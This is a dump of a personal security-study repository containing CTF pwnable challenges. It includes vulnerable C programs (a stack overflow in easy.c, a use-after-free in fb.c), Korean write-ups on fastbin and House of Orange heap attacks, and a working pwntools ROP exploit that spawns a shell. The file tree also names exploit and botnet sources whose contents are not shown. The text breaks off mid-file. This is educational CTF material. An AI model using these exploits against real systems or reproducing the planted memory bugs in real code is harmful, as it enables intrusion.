├── README.md ├── aegis ├── android │ └── README.md ├── forensic │ ├── README.md │ └── challenge1 │ │ ├── README.md │ │ └── zoomIn_3a3f6e35934021eca75b0abde70333a6.jpg ├── kernel │ ├── README.md │ └── linux execve-_ld.so.pdf ├── oop │ ├── LJS_course.dat │ ├── LJS_courseTaken.dat │ ├── LJS_student.dat │ ├── mimi_mysql │ └── work1.c ├── poc ├── pwnable │ ├── README.md │ ├── aegispwnable │ │ ├── README.md │ │ ├── easy │ │ │ ├── banner.txt │ │ │ ├── easy │ │ │ ├── easy.c │ │ │ ├── flag.txt │ │ │ ├── libc-2.23.so │ │ │ └── solve.py │ │ ├── fastbin │ │ │ ├── banner.txt │ │ │ ├── fb │ │ │ ├── fb.c │ │ │ ├── flag.txt │ │ │ └── solve.py │ │ └── heap │ │ │ ├── banner.txt │ │ │ ├── flag.txt │ │ │ ├── heap │ │ │ ├── heap.c │ │ │ ├── libc-2.23.so │ │ │ └── solve.py │ ├── challenge1 │ │ ├── flag │ │ ├── setmagic │ │ ├── setmagic.c │ │ └── write-up.md │ ├── challenge2 │ │ ├── README.md │ │ ├── challenge2 │ │ ├── challenge2.c │ │ ├── flag │ │ └── write-up.md │ └── challenge3 │ │ ├── README.md │ │ ├── flag │ │ ├── prertl │ │ ├── prertl.c │ │ └── solve.py ├── reversing │ ├── README.md │ ├── challenge1 │ │ ├── README.md │ │ ├── decryption.c │ │ ├── encryption.c │ │ └── reversing_challenge1 │ ├── challenge2 │ │ ├── README.md │ │ ├── challenge2 │ │ ├── challenge2.c │ │ └── write-up.md │ ├── challenge3 │ │ ├── README.md │ │ ├── cmp_challenge │ │ └── solve.py │ ├── challenge4 │ │ ├── README.md │ │ └── challenge4 │ └── challenge5 │ │ ├── README.md │ │ ├── police │ │ └── police.c ├── v8 │ └── README.md └── work1.c ├── arm ├── basic_rop.md ├── simple.py └── vuln ├── clang ├── README.md ├── const_vector.cc ├── gogole_gen_tags.py ├── io_multiplexing.md ├── mmap_madvise.c ├── namespace.cc ├── null_dev.c ├── smart_point.cc ├── template.cc ├── type_casting.cc └── typedef.c ├── data-structure └── stack_queue_list.c ├── dwarf └── README.md ├── exploit ├── struct_overflow.c ├── type-confusion0.c └── type-confusion1.cc ├── javascript ├── README.md ├── frida_hook.js └── tencent_check.js ├── json └── README.md ├── kernel ├── README.md ├── dirty_cow.c ├── ftrace.md ├── my_proc_create.c └── slab.md ├── kernel_rop ├── Makefile ├── README.md ├── drv.c ├── drv.h ├── drv.ko ├── drv.mod.c ├── drv.mod.o ├── drv.o ├── find_offset.py ├── modules.order ├── rop_exploit.c ├── trigger └── trigger.c ├── lightaidra ├── Makefile ├── README.md ├── bin │ └── x86_64 ├── docs │ ├── CHANGELOG │ ├── HELP │ └── LICENSE ├── getbinaries.sh ├── include │ ├── attacks.h │ ├── config.h │ ├── headers.h │ ├── irc.h │ ├── main.h │ ├── requests.h │ ├── scan.h │ └── utils.h ├── source │ ├── attacks.c │ ├── hide.c │ ├── irc.c │ ├── main.c │ ├── requests.c │ ├── scan.c │ └── utils.c └── tags ├── lpe ├── lpe.c ├── mark_and_sweep.c ├── pin └── TaintAnalysis.cpp └── synthesis ├── README.md └── synthesis.py /README.md: -------------------------------------------------------------------------------- 1 | # Study list 2 | **My self_study code repository** 3 | - kernel source analysis 4 | - exploit technique 5 | - data structure 6 | - some coding 7 | -------------------------------------------------------------------------------- /aegis/android/README.md: -------------------------------------------------------------------------------- 1 | # Aegis android challenge 2 | **Good luck !** 3 | -------------------------------------------------------------------------------- /aegis/forensic/README.md: -------------------------------------------------------------------------------- 1 | # FORENSIC REPO 2 | **Tools** 3 | - sudo apt-get install exiftool 4 | 5 | `exiftool` is open-source software program for reading, writing, and manipulating image, audio, video, and PDF metadata 6 | 7 | - sudo apt-get install imagemagick 8 | 9 | `imagemagick` is open-source software suite for displaying, converting, and editing raster image and vector image files 10 | -------------------------------------------------------------------------------- /aegis/forensic/challenge1/README.md: -------------------------------------------------------------------------------- 1 | # Aegis Forensic Challenge 2 | **Challenge 1** 3 | 4 | - 스테가노그래피 기법 5 | - Extract Thumbnail Image 6 | - 이미지 좌우대칭 7 | -------------------------------------------------------------------------------- /aegis/forensic/challenge1/zoomIn_3a3f6e35934021eca75b0abde70333a6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/forensic/challenge1/zoomIn_3a3f6e35934021eca75b0abde70333a6.jpg -------------------------------------------------------------------------------- /aegis/kernel/README.md: -------------------------------------------------------------------------------- 1 | # Linux Kernel analysis 2 | 3 | **Contents** 4 | 5 | - Processes, Task Switching, and Scheduling 6 | - Unix Processes 7 | - Address Spaces and Privilege Levels 8 | - Page Tables 9 | - Allocation of Physical Memory 10 | - Timing 11 | - System Calls 12 | - Device Drivers, Block and Character Devices 13 | - Networks 14 | - Filesystems 15 | - Modules and Hotplugging 16 | - Caching 17 | - List Handling 18 | - Object Management and Reference Counting 19 | - Data Types 20 | - ... 21 | -------------------------------------------------------------------------------- /aegis/kernel/linux execve-_ld.so.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/kernel/linux execve-_ld.so.pdf -------------------------------------------------------------------------------- /aegis/oop/LJS_course.dat: -------------------------------------------------------------------------------- 1 | 1111 2 | information security 3 | -------------------------------------------------------------------------------- /aegis/oop/LJS_courseTaken.dat: -------------------------------------------------------------------------------- 1 | 0 2 | 32173412 3 | 1111 4 | A+ 5 | -------------------------------------------------------------------------------- /aegis/oop/LJS_student.dat: -------------------------------------------------------------------------------- 1 | 32173412 2 | asiagaming 3 | software engineering 4 | -------------------------------------------------------------------------------- /aegis/oop/mimi_mysql: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/oop/mimi_mysql -------------------------------------------------------------------------------- /aegis/oop/work1.c: -------------------------------------------------------------------------------- 1 | /* Copyright on asiagaming ( @reverselab ) 2 | * TODO : delete option, show option 3 | * */ 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #define MAXNUM 0x40 13 | #define prefix_student 0 14 | #define prefix_course 1 15 | #define prefix_course_taken 2 16 | 17 | char *prefix[3] = {"_student.dat", "_course.dat", "_courseTaken.dat"}; 18 | char *grade_lists[9] = {"A+", "A-", "B+", "B-", "C+" ,"C-", "D+", "D-", "Fail"}; 19 | 20 | typedef struct{ 21 | unsigned int stdID; 22 | char studentName[0x30]; 23 | char studentMajor[0x30]; 24 | }student; 25 | 26 | typedef struct{ 27 | unsigned int courseID; 28 | char courseName[0x30]; 29 | }course; 30 | 31 | typedef struct{ 32 | unsigned int No; 33 | unsigned int studentID; 34 | unsigned int courseID; 35 | char grade[4]; 36 | }course_taken; 37 | 38 | student *std_array[MAXNUM]; 39 | course *std_course[MAXNUM]; 40 | course_taken *std_course_taken[MAXNUM]; 41 | 42 | int quit = 0; 43 | 44 | int intro(void){ 45 | int user_input = 0; 46 | puts("\n[+] asiagaming's mysql database\n"); 47 | puts("1. create table"); 48 | puts("2. insert table"); 49 | puts("3. show tables"); 50 | puts("4. show table's datas"); 51 | puts("5. binary IO"); 52 | puts("6. quit"); 53 | printf("\n> "); 54 | scanf("%d", &user_input); 55 | return user_input; 56 | } 57 | 58 | void show_insert_menu(void){ 59 | puts("\n1. student"); 60 | puts("2. course"); 61 | puts("3. course_taken"); 62 | printf("\n> "); 63 | } 64 | 65 | void create(void); 66 | void insert(void); 67 | void insert_to_student(void); 68 | void insert_to_course(void); 69 | int insert_to_course_taken(void); 70 | void show_tables(void); 71 | void show_table_datas(void); 72 | void binary_IO(void); 73 | void binary_open(void); 74 | void binary_save(void); 75 | void save_student(char *_nameset, FILE *_fp); 76 | void save_course(char *_nameset, FILE *_fp); 77 | void save_course_taken(char *_nameset, FILE *fp); 78 | void do_read_data_cross_check(FILE *_fp); 79 | void tokenize_match(char *taken_data, char *anonymous_data, int type); 80 | 81 | int main(int argc, char *argv[]){ 82 | setvbuf(stdin, 0, 2, 0); 83 | setvbuf(stdout, 0, 2, 0); 84 | setvbuf(stderr, 0, 2, 0); 85 | while(quit != 6){ 86 | quit = intro(); 87 | switch(quit){ 88 | case 1: 89 | create(); 90 | break; 91 | case 2: 92 | insert(); 93 | break; 94 | case 3: 95 | show_tables(); 96 | break; 97 | case 4: 98 | show_table_datas(); 99 | break; 100 | case 5: 101 | binary_IO(); 102 | break; 103 | case 6: 104 | break; 105 | default: 106 | puts("[-] Wrong."); 107 | break; 108 | } 109 | } 110 | return 0; 111 | } 112 | 113 | void create(void){ 114 | puts("[+] create"); 115 | puts("[-] No meaning in this task..."); 116 | } 117 | void insert(void){ 118 | puts("[+] insert"); 119 | show_insert_menu(); 120 | int iCase = 0; 121 | scanf("%d", &iCase); 122 | switch(iCase){ 123 | case 1: 124 | insert_to_student(); 125 | break; 126 | case 2: 127 | insert_to_course(); 128 | break; 129 | case 3: 130 | insert_to_course_taken(); 131 | break; 132 | default: 133 | puts("[-] Wrong"); 134 | break; 135 | } 136 | } 137 | 138 | /* 139 | 9 typedef struct{ 140 | 10 unsigned int stdID; 141 | 11 char studentName[0x30]; 142 | 12 char studentMajor[0x30]; 143 | 13 }student; 144 | */ 145 | 146 | void insert_to_student(void){ 147 | puts("[+] insert_to_student"); 148 | int index = 0; 149 | for( index = 0; index < 0x40; index++ ){ 150 | if( !std_array[index] ){ 151 | std_array[index] = (student *)malloc(sizeof(student)); 152 | break; 153 | } 154 | } 155 | printf("student ID : "); 156 | scanf("%u", &std_array[index]->stdID); 157 | printf("student name : "); 158 | read(0, std_array[index]->studentName, 0x30); 159 | printf("student major : "); 160 | read(0, std_array[index]->studentMajor, 0x30); 161 | } 162 | 163 | /* 164 | 15 typedef struct{ 165 | 16 unsigned int courseID; 166 | 17 char courseName[0x30]; 167 | 18 }course; 168 | 19 169 | 20 typedef struct{ 170 | 21 unsigned int No; 171 | 22 unsigned int studentID; 172 | 23 unsigned int courseID; 173 | 24 char grade[4]; 174 | 25 }course_taken; 175 | */ 176 | 177 | void insert_to_course(void){ 178 | puts("[+] insert_to_course"); 179 | int index = 0; 180 | for( index = 0; index < 0x40; index++ ){ 181 | if( !std_course[index] ){ 182 | std_course[index] = (course *)malloc(sizeof(course)); 183 | break; 184 | } 185 | } 186 | printf("course ID : "); 187 | scanf("%u", &std_course[index]->courseID); 188 | printf("course name : "); 189 | read(0, std_course[index]->courseName, 0x30); 190 | } 191 | 192 | int insert_to_course_taken(void){ 193 | puts("[+] insert_to_course_taken"); 194 | int index = 0; 195 | int check = 0; 196 | for( index = 0; index < MAXNUM; index++ ){ 197 | if( !std_course_taken[index] ){ 198 | std_course_taken[index] = (course_taken *)malloc(sizeof(course_taken)); 199 | break; 200 | } 201 | } 202 | std_course_taken[index]->No = (unsigned int)index; 203 | printf("student id : "); 204 | scanf("%u", &std_course_taken[index]->studentID); 205 | for(int i = 0; i < MAXNUM; i++ ){ 206 | if( std_array[i] && std_course_taken[index]->studentID == std_array[i]->stdID ){ 207 | check = 1; 208 | break; 209 | } 210 | } 211 | if( !check ){ 212 | printf("[-] No matched studentID\n"); 213 | std_course_taken[index] = 0; // initalize to 0 214 | return -1; 215 | } 216 | printf("course id : "); 217 | scanf("%u", &std_course_taken[index]->courseID); 218 | check = 0; 219 | for(int i = 0; i < MAXNUM; i++ ){ 220 | if( std_course[i] && std_course_taken[index]->courseID == std_course[i]->courseID ){ 221 | check = 1; 222 | break; 223 | } 224 | } 225 | if( !check ){ 226 | printf("[-] No matched courseID\n"); 227 | std_course_taken[index] = 0; // initalize to 0 228 | return -1; 229 | } 230 | printf("grade [A+, A-, ... , Fail] : "); 231 | scanf("%3s", std_course_taken[index]->grade); 232 | for( int i = 0; i < 9; i++ ){ 233 | if( !strcmp( grade_lists[i], std_course_taken[index]->grade ) ){ 234 | break; 235 | } 236 | if( i == 8 ){ 237 | puts("[-] Invalid grade"); 238 | std_course_taken[index] = 0; // initalize to 0 239 | return -1; 240 | } 241 | } 242 | return 0; 243 | } 244 | 245 | void show_tables(void){ 246 | puts("[+] show_tables"); 247 | } 248 | void show_table_datas(void){ 249 | puts("[+] show_table_datas"); 250 | } 251 | void binary_IO(void){ 252 | puts("[+] binary IO"); 253 | printf("\n1. binary open -> read\n"); 254 | printf("\n2. binary save\n"); 255 | int bCase = 0; 256 | scanf("%d", &bCase); 257 | switch(bCase){ 258 | case 1: 259 | binary_open(); 260 | break; 261 | case 2: 262 | binary_save(); 263 | break; 264 | default: 265 | puts("[-] Wrong"); 266 | break; 267 | } 268 | } 269 | 270 | void binary_open(void){ 271 | puts("[+] binary open -> read"); 272 | FILE *fp = 0; 273 | DIR *dir_info; 274 | struct dirent *dir_entry; 275 | dir_info = opendir("."); 276 | if( dir_info != NULL ){ 277 | while( dir_entry = readdir(dir_info) ){ 278 | //printf("%s\n", dir_entry->d_name); 279 | if( strstr( dir_entry->d_name, "_courseTaken.dat" ) ){ 280 | //printf("Find ! : %s\n", dir_entry->d_name); 281 | fp = fopen(dir_entry->d_name, "rb"); 282 | if( !fp ){ 283 | fprintf(stderr, "[-] fopen error\n"); 284 | } 285 | do_read_data_cross_check(fp); 286 | } 287 | } 288 | closedir(dir_info); 289 | } 290 | } 291 | 292 | void save_file(int num){ 293 | FILE *fp = 0; 294 | char name_set[0x30] = {0, }; 295 | printf("name initial : "); 296 | scanf("%10s", name_set); 297 | strcat(name_set, prefix[num - 1]); 298 | fp = fopen(name_set, "wb"); 299 | 300 | switch(num - 1){ 301 | case prefix_student: 302 | save_student(name_set, fp); 303 | break; 304 | case prefix_course: 305 | save_course(name_set, fp); 306 | break; 307 | case prefix_course_taken: 308 | save_course_taken(name_set, fp); 309 | break; 310 | default: 311 | puts("[-] Wrong"); 312 | break; 313 | } 314 | } 315 | 316 | void binary_save(void){ 317 | int fCase = 0; 318 | puts("[+] binary save"); 319 | printf("\n1. student file\n2. course file\n3. course_taken file\n\n> "); 320 | scanf("%d", &fCase); 321 | save_file(fCase); 322 | } 323 | 324 | /* 325 | typedef struct{ 326 | unsigned int stdID; 327 | char studentName[0x30]; 328 | char studentMajor[0x30]; 329 | }student; 330 | */ 331 | 332 | void save_student(char *_nameset, FILE *_fp){ 333 | int index = 0; 334 | char id[0x10] = {0, }; 335 | for( index; index < MAXNUM; index++ ){ 336 | if( std_array[index] ){ 337 | sprintf(id, "%u\n", std_array[index]->stdID); 338 | fwrite(id, strlen(id), 1, _fp); 339 | fwrite(std_array[index]->studentName, strlen(std_array[index]->studentName), 1, _fp); 340 | //fwrite("\n\n", 1, 1, _fp); 341 | fwrite(std_array[index]->studentMajor, strlen(std_array[index]->studentMajor), 1, _fp); 342 | //fwrite("\n\n", 1, 1, _fp); 343 | } 344 | } 345 | fclose(_fp); 346 | } 347 | 348 | void save_course(char *_nameset, FILE *_fp){ 349 | int index = 0; 350 | char id[0x10] = {0, }; 351 | for( index; index < MAXNUM; index++ ){ 352 | if( std_course[index] ){ 353 | sprintf(id, "%u\n", std_course[index]->courseID); 354 | fwrite(id, strlen(id), 1, _fp); 355 | fwrite(std_course[index]->courseName, strlen(std_course[index]->courseName), 1, _fp); 356 | //fwrite("\n\n", 1, 1, _fp); 357 | } 358 | } 359 | fclose(_fp); 360 | } 361 | 362 | /* 363 | typedef struct{ 364 | unsigned int No; 365 | unsigned int studentID; 366 | unsigned int courseID; 367 | char grade[4]; 368 | }course_taken; 369 | */ 370 | 371 | void save_course_taken(char *_nameset, FILE *_fp){ 372 | int index = 0; 373 | char id[0x10] = {0, }; 374 | for( index; index < MAXNUM; index++ ){ 375 | if( std_course_taken[index] ){ 376 | sprintf(id, "%u\n", std_course_taken[index]->No); 377 | fwrite(id, strlen(id), 1, _fp); 378 | sprintf(id, "%u\n", std_course_taken[index]->studentID); 379 | fwrite(id, strlen(id), 1, _fp); 380 | sprintf(id, "%u\n", std_course_taken[index]->courseID); 381 | fwrite(id, strlen(id), 1, _fp); 382 | fwrite(std_course_taken[index]->grade, 4, 1, _fp); 383 | fwrite("\n\n", 1, 1, _fp); 384 | } 385 | } 386 | fclose(_fp); 387 | } 388 | 389 | void do_read_data_cross_check(FILE *_fp){ 390 | char student_data[0x1000] = {0, }; 391 | char course_data[0x1000] = {0, }; 392 | char course_taken_data[0x1000] = {0, }; 393 | 394 | fread(course_taken_data, 0x1000, 1, _fp); 395 | 396 | FILE *fp = 0; 397 | DIR *dir_info; 398 | struct dirent *dir_entry; 399 | dir_info = opendir("."); 400 | if( dir_info != NULL ){ 401 | while( dir_entry = readdir(dir_info) ){ 402 | if( strstr( dir_entry->d_name, "_course.dat" ) ){ 403 | fp = fopen(dir_entry->d_name, "rb"); 404 | if( !fp ){ 405 | fprintf(stderr, "[-] fopen error\n"); 406 | } 407 | fread(course_data, 0x1000, 1, fp); 408 | tokenize_match(course_taken_data, course_data, prefix_course); 409 | fclose(fp); 410 | } 411 | if( strstr( dir_entry->d_name, "_student.dat" ) ){ 412 | fp = fopen(dir_entry->d_name, "rb"); 413 | if( !fp ){ 414 | fprintf(stderr, "[-] fopen error\n"); 415 | } 416 | fread(student_data, 0x1000, 1, fp); 417 | tokenize_match(course_taken_data, student_data, prefix_student); 418 | fclose(fp); 419 | } 420 | } 421 | closedir(dir_info); 422 | } 423 | } 424 | 425 | #define chunkNo 0 426 | #define stuidNo 1 427 | #define courseNo 2 428 | #define gradeNo 3 429 | 430 | void tokenize_match(char *taken_data, char *anonymous_data, int type){ 431 | char subdata[0x1000] = {0, }; 432 | char anonymousdata[0x1000] = {0, }; 433 | char *takens[4]; 434 | char *anonymous; 435 | memcpy(subdata, taken_data, 0x1000); 436 | memcpy(anonymousdata, anonymous_data, 0x1000); 437 | takens[0] = strtok(subdata, "\n"); 438 | for( int i = 1; i < 4; i++ ){ 439 | takens[i] = strtok(NULL, "\n"); 440 | } 441 | anonymous = strtok(anonymousdata, "\n"); 442 | if( type == prefix_student ){ 443 | do{ 444 | if( !strcmp(takens[stuidNo], anonymous)){ 445 | //printf("student id : %s\n", anonymous); 446 | printf("student name : %s\n", strtok(NULL, "\n")); 447 | printf("grade : %s\n", takens[gradeNo]); 448 | } 449 | }while(anonymous = strtok(NULL, "\n")); 450 | } 451 | if( type == prefix_course ){ 452 | do{ 453 | if( !strcmp(takens[courseNo], anonymous)){ 454 | //printf("course id : %s\n", anonymous); 455 | printf("course name : %s\n", strtok(NULL, "\n")); 456 | } 457 | }while(anonymous = strtok(NULL, "\n")); 458 | } 459 | } 460 | -------------------------------------------------------------------------------- /aegis/poc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/poc -------------------------------------------------------------------------------- /aegis/pwnable/README.md: -------------------------------------------------------------------------------- 1 | # Aegis pwnable challenge 2 | **Challenge 1** 3 | - Simple GDB Usage 4 | - Using `set` command 5 | - Same challenge as `hitcon training lab1` 6 | 7 | **Challenge 2** 8 | - Simple shellcode challenge in 64bit 9 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/README.md: -------------------------------------------------------------------------------- 1 | 2 | 1. easy 3 | 4 | -> urandom에서 32바이트의 값을 읽어오는데, 이 urandom값과 key값을 동일하게 맞춰줄 경우, gPwn함수에서 bof가 발생하게 됩니다. 5 | 6 | ukey에 유저 입력 값을, skey에 urandom값을 담는데, 둘 다 같은 bss영역에 연달아 붙어있습니다. 7 | gEdit()함수에서 ukey에 담긴 값을 변경할 수 있는데, 사이즈체크를 strlen()함수로 합니다. 8 | 여기서 skey와 값이 끊기지않고 담겨있다면 strlen에서 64바이트를 리턴하게되며, 이를 통해 ukey -> skey까지 모두 덮을 수 있게 됩니다. 9 | 10 | 이를 이용하여 gPwn에서의 skey == ukey조건을 맞추어주고나면 puts함수를 이용한 library leak이 가능해지며, 다시 main으로 돌아와 leak된 주소를 바탕으로 쉘을 획득하면 됩니다. 11 | 12 | 간단한 rop문제입니다. 13 | 14 | 15 | 2. heap 16 | 17 | -> 0x68, 0x88, 0x228 크기로 동적할당할 수 있으며, 전역배열을 통해 heap chunk를 관리하게됩니다. 18 | 바이너리는 full relro + pie + nx, 그리고 기본 환경 보호옵션은 aslr입니다. 19 | gClear를 통해 전역배열에 위치하는 heap pointer를 free할 수 있으며, 하자마자 초기화 시켜버립니다. 20 | gEdit을 통해 1번의 easy문제처럼 strlen()으로 구한 길이만큼 수정할 수 있습니다. 21 | 여기서 size overwrite나 unsafe unlink류의 heap 취약점이 발생합니다. 22 | 23 | 1차 버전은 마음대로 free를 할 수 없으며, top chunk size overwrite를 통해, 앞의 chunk를 강제로 free시키는 로직을 넣었었는데, 중급 문제치고는 너무 어려워지는 경향이 있어서 수정을 했습니다. 24 | 25 | unsorted bin의 fd, bk가 설정되는 것을 이용하여 gWrite()에서 memory leak이 가능합니다. 26 | pie옵션 때문에, 전역배열에서 heap pointer들을 관리한다고 하더라도, code base를 알 수 있는 방법이 없기때문에, 여기서는 unsafe unlink를 사용할 수 없습니다. 27 | 28 | 의도한 풀이는 fastbin attack입니다. 29 | 0x68이라는 사이즈를 힌트삼아 __malloc_hook류나 다른 쪽 overwrite를 의도했습니다. 30 | 전역배열의 heap pointer는 free하는 순간 초기화시키기때문에, 다른 루틴이 한 번 필요합니다. 31 | chunk의 size를 overwrite하여 chunk overlapping을 유도합니다. 32 | overlapping이 되면, 같은 heap위치에 2개의 chunk가 공존할 수 있으므로, double free가 가능해집니다. 33 | 그리고 이를 이용하여 fastbin을 다시 할당하면서 fastbin->fd를 적당한 영역으로 수정해주게되면, arbitrary memory write가 가능해집니다. 34 | 35 | 36 | 3. fb 37 | 38 | Fastbin attack과 chunk overlapping, House of Orange 테크닉을 아는지 종합적으로 물어보는 문제입니다. 39 | 물론 이 테크닉들은 다 유명하고 여러 CTF에서 사용된 것들이기에 크게 어렵진 않습니다. 40 | 41 | 이번 ASIS CTF에 출제된 fifty dollars라는 문제처럼 fastbin attack을 통해 fake file stream을 구성하도록 할려다가 42 | 편의상 쉽게 file structure를 만들 수 있도록 once()라는 함수를 추가했습니다. 43 | 44 | 간단하게만 설명하자면, Fastbin attack을 통해 특정 chunk의 size를 unsorted bin chunk로 맞추어줍니다. 45 | 그리고 해당 chunk를 free하면 main_arena + 88의 값이 쓰이게되고, 이 값을 show를 통해 leak할 수 있습니다. 46 | 할당되는 chunk들은 전역배열에서 관리되며, free후에 초기화시키지않아 UAF가 모든 chunk에 있어서 발생합니다. 47 | 48 | 같은 방식으로, 이 free된 unsorted bin chunk에 fake file stream을 구성하여 House of Orange테크닉으로 끌고가여 쉘을 획득하면 되는 문제입니다. 49 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/easy/banner.txt: -------------------------------------------------------------------------------- 1 | _____ _______ _____ _ __ 2 | / ____|__ __|/\ / ____| |/ / 3 | | (___ | | / \ | | | ' / 4 | \___ \ | | / /\ \| | | < 5 | ____) | | |/ ____ \ |____| . \ 6 | |_____/ |_/_/ \_\_____|_|\_\ 7 | 8 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/easy/easy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/pwnable/aegispwnable/easy/easy -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/easy/easy.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | char ukey[32]; 8 | char skey[32]; 9 | int _chk; 10 | 11 | void initialize(){ 12 | char buf; 13 | setvbuf(stdin, 0, 2, 0); 14 | setvbuf(stdout, 0, 2, 0); 15 | setvbuf(stderr, 0, 2, 0); 16 | int fd = open("/dev/urandom", O_RDONLY); 17 | if( read(fd, skey, 32) != 32 ){ exit(-1); } 18 | close(fd); 19 | fd = open("./banner.txt", O_RDONLY); 20 | if( fd < 0 ){ exit(-1); } 21 | while( read(fd, &buf, 1) ) 22 | write(1, &buf, 1); 23 | close(fd); 24 | } 25 | 26 | void menu(){ 27 | puts("1. Read"); 28 | puts("2. Write"); 29 | puts("3. Edit"); 30 | write(1, "> ", 2); 31 | } 32 | 33 | void gRead(){ 34 | if( _chk ){ return; } 35 | write(1, "> ", 2); 36 | read(0, ukey, 32); 37 | _chk = 1; 38 | } 39 | void gWrite(){ 40 | write(1, "> ", 2); 41 | write(1, ukey, 32); 42 | } 43 | void gEdit(){ 44 | write(1, "> ", 2); 45 | read(0, ukey, strlen(ukey)); 46 | } 47 | void gPwn(){ 48 | if( memcmp(ukey, skey, 32) != 0 ){ exit(-1); } 49 | char buf[16] = {0, }; 50 | write(1, "> ", 2); 51 | read(0, buf, 0x38); 52 | } 53 | 54 | int main(int argc, char *argv[]){ 55 | int choice; 56 | initialize(); 57 | while(1){ 58 | menu(); 59 | scanf("%d", &choice); 60 | switch(choice){ 61 | case 1: 62 | gRead(); 63 | break; 64 | case 2: 65 | gWrite(); 66 | break; 67 | case 3: 68 | gEdit(); 69 | break; 70 | case 0x1337: 71 | gPwn(); 72 | break; 73 | default: 74 | puts("[-] Invalid choice"); 75 | break; 76 | } 77 | } 78 | return 0; 79 | } 80 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/easy/flag.txt: -------------------------------------------------------------------------------- 1 | flag{4asy_p3sy_kn0w_th3_r0p} 2 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/easy/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/pwnable/aegispwnable/easy/libc-2.23.so -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/easy/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = process(["./easy"]) 4 | 5 | binary = ELF("./easy") 6 | pop1rdi = 0x0000000000400be3 # : pop rdi; ret; 7 | main = 0x400add 8 | 9 | p.sendlineafter("> ", "1") 10 | p.sendafter("> ", "A" * 0x20) 11 | p.sendlineafter("> ", "3") 12 | p.sendafter("> ", "A" * 0x40) 13 | p.sendlineafter("> ", str(0x1337)) 14 | p.sendafter("> ", "A" * 0x10 + "B" * 8 + p64(pop1rdi) + p64(binary.got["puts"]) + p64(binary.plt["puts"]) + p64(main)) 15 | leak = u64(p.recv(6).ljust(8, "\x00")) 16 | libc_base = leak - 0x6f690 17 | system = libc_base + 0x45390 18 | binsh = libc_base + 0x18cd57 19 | log.info("leak : " + hex(leak)) 20 | log.info("libc_base : " + hex(libc_base)) 21 | 22 | 23 | #### stage 2 -> do rop #### 24 | 25 | p.sendlineafter("> ", "3") 26 | p.sendafter("> ", "A" * 0x40) 27 | p.sendlineafter("> ", str(0x1337)) 28 | p.sendafter("> ", "A" * 0x10 + "B" * 8 + p64(pop1rdi) + p64(binsh) + p64(system) + p64(0xdeadbeef)) 29 | p.interactive() 30 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/fastbin/banner.txt: -------------------------------------------------------------------------------- 1 | ___ ___ ________ 2 | / | \ ____ \_____ \ 3 | / ~ \/ _ \ / | \ 4 | \ Y ( <_> ) | \ 5 | \___|_ / \____/\_______ / 6 | \/ \/ 7 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/fastbin/fb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/pwnable/aegispwnable/fastbin/fb -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/fastbin/fb.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | void *chunk_array[0x10]; 8 | int check = 0; 9 | 10 | void initialize(){ 11 | char buf; 12 | setvbuf(stdin, 0, 2, 0); 13 | setvbuf(stdout, 0, 2, 0); 14 | setvbuf(stderr, 0, 2, 0); 15 | int fd = open("./banner.txt", O_RDONLY); 16 | if( fd < 0 ){ exit(-1); } 17 | while( read(fd, &buf, 1) ) 18 | write(1, &buf, 1); 19 | close(fd); 20 | } 21 | 22 | void menu(){ 23 | puts("1. Read"); 24 | puts("2. Write"); 25 | puts("3. Delete"); 26 | write(1, "> ", 2); 27 | } 28 | 29 | void gRead(){ 30 | int i; 31 | write(1, "> ", 2); 32 | for(i = 0; chunk_array[i]; i++); 33 | chunk_array[i] = malloc(0x48); 34 | read(0, chunk_array[i], 0x48); 35 | } 36 | 37 | void gWrite(){ 38 | int index; 39 | write(1, "> ", 2); 40 | scanf("%d", &index); 41 | if( chunk_array[index] && index >= 0 && index <= 15 ){ 42 | write(1, "> ", 2); 43 | write(1, chunk_array[index], strlen(chunk_array[index])); 44 | } 45 | else{ 46 | puts("[-] Invalid index"); 47 | } 48 | } 49 | 50 | void gClear(){ 51 | int i; 52 | write(1, "> ", 2); 53 | scanf("%d", &i); 54 | if( chunk_array[i] && i >= 0 && i <= 15 ){ 55 | free(chunk_array[i]); 56 | //chunk_array[i] = 0; 57 | } 58 | } 59 | 60 | void once(){ 61 | if(check){ exit(-1); } 62 | int index; 63 | write(1, "> ", 2); 64 | scanf("%d", &index); 65 | fflush(stdout); 66 | fflush(stdin); 67 | if( chunk_array[index] && index >= 0 && index <= 15 ){ 68 | write(1, "> ", 2); 69 | read(0, chunk_array[index], 0x100); 70 | } 71 | check = 1; 72 | } 73 | 74 | int main(int argc, char *argv[]){ 75 | int choice; 76 | initialize(); 77 | while(1){ 78 | menu(); 79 | scanf("%d", &choice); 80 | switch(choice){ 81 | case 1: 82 | gRead(); 83 | break; 84 | case 2: 85 | 